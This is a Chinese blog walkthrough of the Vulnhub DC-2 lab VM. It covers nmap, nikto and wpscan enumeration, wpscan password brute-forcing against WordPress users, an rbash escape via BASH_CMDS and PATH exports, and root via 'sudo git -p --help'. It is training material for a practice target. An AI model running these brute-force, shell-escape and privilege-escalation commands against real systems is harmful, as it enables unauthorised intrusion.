Vulnhub DC-2靶机练习 shell限制绕过 sudo-git提权

说明

kali攻击机IP:192.168.255.139
靶机IP:192.168.255.144
靶机下载地址

主机发现

在这里插入图片描述

端口扫描

发现80端口跟7744端口,7744端口是ssh服务
使用的是nmap工具,命令:nmap -sV -Pn -p- -v 192.168.255.144
在这里插入图片描述

访问80端口开启的页面就可以发现flag1

在这里插入图片描述

获取flag1之后提示需要登录,这时我们用到nikto工具扫描敏感目录

扫描之后获得后台管理登录页面wp-login.php
使用的命令是:nikto -h http://dc-2/
在这里插入图片描述
在这里插入图片描述

发现是WordPress的博客网站这里使用wpscan工具获取用户

wpscan工具是一个针对扫描 WordPress 漏洞的黑盒子扫描器
这里我们使用wpscan --url dc-2 -e u命令获取用户名
wpscan工具使用教程:
这里我们发现三个用户名:admin,jerry,tom
在这里插入图片描述

接下来生成密码字典,用到cewl工具

cewl工具是在URL上收集单词的工具
命令:

cewl http://dc-2/ -w 3.txt

在这里插入图片描述

密码字典有了就可以用wpscan工具对账号密码进行爆破

wpscan --url http://dc-2/ -P 3.txt -U admin   //爆破admin的密码,无法爆出
wpscan --url http://dc-2/ -P 3.txt -U jerry   //爆破jerry密码为 adipiscing
wpscan --url http://dc-2/ -P 3.txt -U tom		//爆破tom密码为 parturient

在这里插入图片描述
登录成功获取到flag2
在这里插入图片描述
上面提示访问80端口不是正确的方法,需要换另一种途径,开始通过nmap端口扫描发现还开了一个7744端口是ssh服务,ssh服务默认端口为22.

远程ssh连接

命令为:ssh tom@192.168.255.144 -p 7744

在这里插入图片描述
接下来就是乱翻,在输入ls之后就发现了flag3,但是用cat命令时发现不能用。
在这里插入图片描述
使用compgen -c命令查看能用那些命令,看见可以用vi命令来查看文件。

在这里插入图片描述
这里说明了tom用户和jerry用户 提示说需要使用su命令修改为jerry用户
但是不能用su命令啊,这里不能用某些命令的原因时shell被限制了

绕过shell限制

输入被限制的命令会显示-rbash,rbash是Restricted Shell,即受限的shell,它与一般标准shell的区别在于会限制执行一些行为。
绕过方法

BASH_CMDS[a]=/bin/sh;a     //调用/bin/sh命令解释器
/bin/bash
export PATH=$PATH:/bin/    //设置环境变量
export PATH=$PATH:/usr/bin

在这里插入图片描述
限制解除,用su命令切换到jerry用户
在这里插入图片描述
切换成功,接下来获取flag4
在这里插入图片描述
翻译:
在这里插入图片描述
。。。。。。。。。
还剩下最后一个不多说就是提升到root权限

获取root权限

这里我们可以用到sudo进行提权

sudo是赋予普通用户某个命令有root权限,且不需要root密码,是一种临时的权限

这里使用sudo -l命令来查看那些命令有root权限发现git有权限

sudo -l                //查看存在root权限的命令
sudo git -p --help     //提权
!/bin/bash             //执行获得root权限

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

最后获取最后一个flag

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值